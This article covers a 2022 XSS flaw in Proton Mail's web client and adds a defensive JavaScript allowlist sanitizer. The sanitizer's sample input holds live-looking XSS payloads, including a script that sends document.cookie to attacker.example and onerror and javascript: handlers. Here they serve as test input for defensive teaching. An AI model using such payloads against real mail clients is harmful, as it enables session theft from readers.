The Sonar Research team identified the vulnerability during a routine audit of Proton's open-source repositories. The issue stemmed from how the web application handled user-controlled HTML. Senders need the ability to style messages, but if certain tags are not properly sanitized before rendering, script carried by a malicious tag can run in the reader's browser.

How the Exploit Worked

The attack required a specific sequence of actions to succeed, which limited its real-world viability: an attacker would need to send two carefully crafted emails to the target.

The vulnerability was strictly limited to the web interface; the non-web Proton Mail apps (iOS/Android) were never affected.

After researchers disclosed the bug in June 2022, Proton developed and deployed a fix by early July 2022. Analysis of spam and virus filter logs showed no evidence of the exploit being used in the wild by malicious actors.

Protecting Your Data

Avoid clicking unexpected links in emails, even from seemingly secure providers.

Ensure you are using the latest version of any Proton applications.
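For developers, the root cause described at the top of this page (HTML from a sender reaching the reader's browser without adequate sanitization) is easiest to see in code. The following is an added illustration written for this page; it is not Proton's sanitizer and not Sonar's proof of concept, and it does not reproduce the specific tags involved in the reported bug. The allowed tags, the allowed attributes, the helper names and the sample message are all assumptions chosen for the example. It shows the allowlist approach a webmail client needs: anything not explicitly permitted is dropped, event-handler attributes never survive, and only http(s) and mailto links are kept.

```javascript
"use strict";

// Added example, not Proton's code. Tag and attribute allowlists are assumptions.
const ALLOWED_TAGS = new Set(["p", "br", "b", "i", "u", "em", "strong", "a", "span", "div", "ul", "ol", "li"]);
const ALLOWED_ATTRS = new Map([
  ["a", new Set(["href"])],
  ["span", new Set(["style"])],
  ["div", new Set(["style"])],
]);
const VOID_TAGS = new Set(["br"]);
// Elements whose body must be discarded together with the element itself.
const DROP_WITH_CONTENT = new Set(["script", "style", "iframe", "object", "embed", "svg", "math", "template", "noscript"]);

function escapeText(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

// Only http(s) and mailto links survive. Control characters are stripped first so
// that "java\tscript:" cannot slip past the scheme check.
function safeHref(v) {
  return /^(https?:|mailto:)/i.test(v.replace(/[\u0000-\u0020]/g, ""));
}

// Reject CSS that can fetch remote resources or (in legacy engines) execute code.
function safeStyle(v) {
  return !/(url\s*\(|expression\s*\(|javascript:|@import|behavior\s*:|-moz-binding)/i.test(v);
}

// name, optionally followed by =value (double-quoted, single-quoted or bare)
const ATTR_RE = /([^\s"'>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

function renderOpenTag(name, attrStr) {
  const allowed = ALLOWED_ATTRS.get(name) || new Set();
  let out = "<" + name;
  for (const m of attrStr.matchAll(ATTR_RE)) {
    const attr = m[1].toLowerCase();
    const value = m[2] ?? m[3] ?? m[4] ?? "";
    if (!allowed.has(attr)) continue;              // drops onload, onerror, srcdoc, ...
    if (attr === "href" && !safeHref(value)) continue;
    if (attr === "style" && !safeStyle(value)) continue;
    out += ` ${attr}="${escapeText(value)}"`;
  }
  if (name === "a") out += ' target="_blank" rel="noopener noreferrer"';
  return out + ">";
}

function sanitizeHtml(input) {
  let out = "";
  const open = [];                                   // stack of open tags we emitted
  let i = 0;
  while (i < input.length) {
    const lt = input.indexOf("<", i);
    if (lt === -1) { out += escapeText(input.slice(i)); break; }
    out += escapeText(input.slice(i, lt));
    if (input.startsWith("<!--", lt)) {              // comments are dropped whole
      const end = input.indexOf("-->", lt + 4);
      i = end === -1 ? input.length : end + 3;
      continue;
    }
    const m = /^<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/.exec(input.slice(lt));
    if (!m) { out += "&lt;"; i = lt + 1; continue; }  // stray '<' is plain text
    const [whole, slash, rawName, attrStr] = m;
    const name = rawName.toLowerCase();
    i = lt + whole.length;
    if (!slash && DROP_WITH_CONTENT.has(name)) {     // skip element and its body
      const close = input.toLowerCase().indexOf("</" + name, i);
      if (close === -1) break;
      const gt = input.indexOf(">", close);
      i = gt === -1 ? input.length : gt + 1;
      continue;
    }
    if (!ALLOWED_TAGS.has(name)) continue;           // unknown tag: drop tag, keep its text
    if (slash) {
      const depth = open.lastIndexOf(name);
      if (depth === -1) continue;                    // close without matching open: ignore
      while (open.length > depth) out += "</" + open.pop() + ">";
    } else {
      out += renderOpenTag(name, attrStr);
      if (!VOID_TAGS.has(name)) open.push(name);
    }
  }
  while (open.length) out += "</" + open.pop() + ">"; // never leave tags open in the reader's DOM
  return out;
}

// Constructed sample message: styled text mixed with a script block, an inline
// event handler and a javascript: link, the kind of payload a sanitizer must strip.
const SAMPLE = '<p style="color:red">Hi <b onclick="alert(1)">there</b></p>' +
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>' +
  '<img src=x onerror="alert(document.domain)">' +
  '<a href="javascript:alert(1)">click</a> <a href="https://example.com">ok</a>';

console.log(sanitizeHtml(SAMPLE));
```

The point of the allowlist is the direction of the default: a denylist that forgets one tag or one attribute fails open, while an allowlist that forgets one fails closed and only costs the sender some formatting. This hand-rolled tokenizer is enough to show the principle but is not a substitute for a maintained sanitizer such as DOMPurify in a real client, which also handles attribute values containing `>`, nested parsing quirks and browser-specific mutation behaviour that a regex-based scanner does not.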